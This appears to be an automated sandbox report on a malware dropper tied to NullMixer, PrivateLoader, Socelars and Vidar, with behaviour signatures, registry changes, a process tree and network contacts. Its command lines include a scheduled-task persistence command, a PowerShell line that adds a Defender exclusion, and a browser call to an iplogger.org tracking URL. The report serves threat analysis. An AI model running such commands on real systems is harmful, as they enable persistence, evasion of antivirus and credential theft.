Analysis Overview
SHA256
51837836176f75bd57295071de596b18ec1a1af63681ccfdd69f5dedb0976da3
Threat Level: Known bad
The file 905632896c45f77778bf0d6955d68c42_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Vidar
Nullmixer family
Socelars payload
Vidar family
NullMixer
Socelars
Socelars family
PrivateLoader
Vidar Stealer
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Looks up geolocation information via web service
Checks installed software on the system
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Program crash
Enumerates physical storage devices
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-23 19:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-23 19:54
Reported
2024-11-23 19:57
Platform
win7-20240729-en
Max time kernel
62s
Max time network
151s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\c4820dd43af06255.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Looks up geolocation information via web service
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\4a97b300fe2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\73c5ea81f5117.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\a7ffedbefb5b58d4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EB203C71-A9D4-11EF-959A-C67E5DF5E49D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d1013002f91823f1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4a97b300fe2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a7ffedbefb5b58d4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6190f7acba29203.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c4820dd43af06255.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 73c5ea81f5117.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\4a97b300fe2.exe
4a97b300fe2.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f1.exe
d1013002f91823f1.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\6190f7acba29203.exe
6190f7acba29203.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\a7ffedbefb5b58d4.exe
a7ffedbefb5b58d4.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\c4820dd43af06255.exe
c4820dd43af06255.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 562e5c38e3756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 00e36d77b6e888.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f1.exe" -a
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9015ceeff479.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d1013002f91823f010.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\562e5c38e3756.exe
562e5c38e3756.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\00e36d77b6e888.exe
00e36d77b6e888.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\73c5ea81f5117.exe
73c5ea81f5117.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\9015ceeff479.exe
9015ceeff479.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\d1013002f91823f010.exe
d1013002f91823f010.exe
C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\9015ceeff479.exe
"C:\Users\Admin\AppData\Local\Temp\7zS053E74F7\9015ceeff479.exe"
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732391699 0
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 432
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2640 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.5.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
